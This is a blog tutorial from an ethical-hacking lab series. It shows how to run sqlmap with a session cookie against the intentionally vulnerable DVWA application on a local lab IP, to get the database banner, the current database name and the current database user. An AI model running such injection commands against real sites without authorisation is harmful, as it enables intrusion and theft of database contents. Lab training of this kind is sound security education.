SQL injection lab PT.4 – Using SqlMap to Obtain Current User and Database

AD : 45 ways to earn money online. Get youtube videos here free :  https://www.youtube.com/playlist?list=PLEG4CvuvNZdcyHYi5g3I9AR6zrDEUXw0X

Welcome back Gurkhas ! …in SQL injection lab PT.4 

By : Bijay Acharya  | Add him in Facebook here >https://www.facebook.com/nhcbijay.ach  |  Follow him in twitter : @acharya_bijay   | Subscribe his tutorial channel for ethical hacking videos (in nepali language) here > >Student Video Tutorial 

Section 10: Using SqlMap to Obtain Current User and Database 

1. Verify sqlmap.py exists
o Instructions:
1. cd /pentest/database/sqlmap
2. ls -l sqlmap.py

14-sqlmap

2. Obtain Database User For DVWA
o Notes(FYI):
1. Obtain the referer link from (Section 9, Step
10), which is placed after the “-u” flag below.
2. Obtain the cookie line from (Section 9, Step 10),
which is placed after the “–cookie” flag below.
3. Replace 192.168.1.106 with Fedora’s IP address
obtained in (Section 3, Step 3).
4. Replace (lpb5g4uss9kp70p8jccjeks621) with your
PHPSESSID obtained from (Section 9, Step 10).
o Instructions:
1. ./sqlmap.py -u
“http://192.168.1.106/dvwa/vulnerabilities/sqli/?
id=1&Submit=Submit” —

cookie=”PHPSESSID=lpb5g4uss9kp70p8jccjeks621;
security=low” -b –current-db –current-user
 -u, Target URL
 –cookie, HTTP Cookie header
 -b, Retrieve DBMS banner
 –current-db, Retrieve DBMS current database
 –current-user, Retrieve DBMS current user
o

15-sql-map

3. Do you want to keep testing?
o Instructions:
1. keep testing? y
2. skip payloads? y

16-sqlmap

4. Viewing Results
o Instructions:
1. For the web application DVWA, the database name
is “dvwa” and the programs that communicate with
the database is “root@localhost”;

17-sql-map

….Ok Gurkhas, we’ll continue this in next part.  Check out our social network site for hackers here > hcnepal.com

708 total views, 1 views today

Leave a Reply

Your email address will not be published. Required fields are marked *